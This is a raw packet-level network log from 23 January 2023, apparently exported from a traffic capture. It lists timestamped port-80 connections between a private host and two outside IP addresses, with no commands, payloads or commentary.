                                                                                                                                        Jan 23, 2023 21:25:08.532289028 CET8049703208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:08.551992893 CET4970380192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:08.584162951 CET8049703208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:08.584237099 CET4970380192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:11.571495056 CET4970480192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:11.603656054 CET8049704208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:11.603861094 CET4970480192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:11.630594015 CET4970480192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:11.664326906 CET8049704208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:11.782521009 CET4970480192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:22.240396976 CET4970580192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:22.272439957 CET8049705208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:22.272852898 CET4970580192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:22.278419018 CET4970580192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:22.312055111 CET8049705208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:22.361565113 CET4970580192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:22.873239040 CET4970680192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:22.905823946 CET8049706208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:22.906618118 CET4970680192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:22.916079998 CET4970680192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:22.949666977 CET8049706208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:23.033792973 CET4970680192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:23.066507101 CET4970480192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:23.098547935 CET8049704208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:23.098670959 CET4970480192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:23.156616926 CET4970780192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:23.289489031 CET804970792.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:23.289617062 CET4970780192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:23.289814949 CET4970780192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:23.422597885 CET804970792.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:23.524386883 CET804970792.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:23.642919064 CET4970780192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:24.159368038 CET4970780192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:24.292308092 CET804970792.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:24.331115007 CET804970792.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:24.533682108 CET4970780192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:28.384064913 CET804970792.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:28.384248018 CET4970780192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:29.347852945 CET4970780192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:29.348463058 CET4970880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:29.482371092 CET804970792.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:29.483927965 CET804970892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:29.484061003 CET4970880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:29.484357119 CET4970880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:29.620053053 CET804970892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:29.625597000 CET804970892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:29.862272978 CET4970880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:33.569564104 CET804970892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:33.569741964 CET4970880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:33.631716013 CET4970880192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:33.735064030 CET4970980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:33.765562057 CET804970892.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:33.866054058 CET804970992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:33.866224051 CET4970980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:33.866869926 CET4970980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:33.997765064 CET804970992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:34.095911026 CET804970992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:34.143781900 CET4970980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:34.347161055 CET4971080192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:34.379106998 CET8049710208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:34.379235029 CET4971080192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:34.380011082 CET4971080192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:34.413429976 CET8049710208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:34.534441948 CET4971080192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:36.861052990 CET4970580192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:36.893050909 CET8049705208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:36.893131971 CET4970580192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:36.922358990 CET4971180192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:36.954301119 CET8049711208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:36.954489946 CET4971180192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:36.957734108 CET4971180192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:36.991178036 CET8049711208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:37.050304890 CET4971180192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:37.391151905 CET4971180192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:37.425131083 CET8049711208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:37.550348997 CET4971180192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:38.967911005 CET804970992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:38.967972994 CET4970980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:39.078352928 CET4970680192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:39.099823952 CET4970980192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:39.110711098 CET8049706208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.112668991 CET4970680192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:39.181319952 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:39.185693026 CET4971380192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:39.215038061 CET8049713208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.218374014 CET4971380192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:39.225068092 CET4971380192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:39.230784893 CET804970992.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.255388975 CET8049713208.95.112.1192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.310651064 CET804971292.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.311069012 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:39.311254978 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:39.347934961 CET4971380192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:39.440323114 CET804971292.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.451045036 CET804971292.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:39.534856081 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:41.314549923 CET4971380192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:42.490222931 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:42.659713984 CET804971292.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:42.659754992 CET804971292.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:42.847628117 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:46.367243052 CET804971292.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:46.367320061 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:47.302592039 CET4971180192.168.2.3208.95.112.1
                                                                                                                                        Jan 23, 2023 21:25:47.676419973 CET4971280192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:47.734384060 CET4971580192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:47.805752039 CET804971292.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:47.863987923 CET804971592.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:47.864128113 CET4971580192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:47.864337921 CET4971580192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:47.993766069 CET804971592.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:47.998567104 CET804971592.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:48.149800062 CET4971580192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:51.969892025 CET804971592.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:51.970092058 CET4971580192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.015397072 CET4971580192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.136583090 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.145040989 CET804971592.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.267484903 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.267765999 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.268623114 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.399266005 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.495882034 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.511815071 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.642554045 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.642586946 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.644560099 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.644714117 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.644793987 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.775521994 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.775631905 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.775672913 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.775759935 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.906958103 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.906992912 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.907011032 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:52.907457113 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:52.907891035 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.038537979 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.038611889 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.038726091 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.038795948 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.038901091 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.038907051 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.038954973 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.039011955 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.039021015 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.039058924 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.039073944 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.039215088 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.101974964 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.169851065 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.169887066 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.169919968 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.170125961 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170145988 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.170253992 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.170309067 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170452118 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170527935 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170566082 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.170603037 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170717001 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170777082 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.170779943 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170831919 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170895100 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170969009 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.170980930 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.171060085 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.171147108 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.171158075 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.171241045 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.171247959 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.171330929 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.171411037 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.171451092 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.171497107 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.171581984 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.171655893 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.232938051 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.233104944 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.233323097 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.301035881 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.301165104 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.301189899 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.301475048 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.301538944 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.301568031 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.301647902 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.301760912 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.301781893 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.301871061 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.301889896 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.301985979 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.302062035 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.302089930 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.302146912 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.302229881 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.302251101 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.302386045 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.302407980 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.302454948 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.302473068 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.302495956 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.302520990 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.302593946 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.302613020 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.302705050 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.302797079 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.302830935 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.302891016 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.302912951 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.302972078 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.303004980 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.303004980 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.303083897 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.303169012 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.303189993 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.303272963 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.303349018 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.303381920 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.303457975 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.303534985 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.303556919 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.303725004 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.303807974 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.303894043 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.303981066 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.304003000 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.304109097 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.304191113 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.304214954 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.304282904 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.304363012 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.304385900 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.304553986 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.304647923 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.304676056 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.304784060 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.304800987 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.304857969 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.304881096 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.304881096 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.304889917 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.305031061 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.305053949 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.364058018 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.364085913 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.364308119 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.404721022 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.404838085 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.407936096 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.432154894 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.432229996 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.432296038 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.432320118 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.432394981 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.432435036 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.432462931 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.432517052 CET4971680192.168.2.392.249.45.113
                                                                                                                                        Jan 23, 2023 21:25:53.432600975 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.432856083 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.433095932 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.433242083 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.433531046 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.433557987 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.433850050 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.433876991 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.433998108 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.434247017 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.434315920 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.434370041 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.434571028 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.434781075 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.434818029 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.435045958 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.435074091 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.435154915 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.435199976 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.435434103 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.435611963 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.435628891 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.435864925 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.435929060 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.435962915 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.436230898 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.436336040 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.436364889 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.436655045 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.436758995 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.436794996 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.437021017 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.437164068 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.437527895 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.437552929 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.437572002 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.437700033 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.437768936 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.437982082 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.438079119 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.438123941 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.438344955 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.438405991 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.438440084 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.438671112 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.438863039 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.438982010 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.439198017 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.439222097 CET804971692.249.45.113192.168.2.3
                                                                                                                                        Jan 23, 2023 21:25:53.439284086 CET804971692.249.45.113192.168.2.3
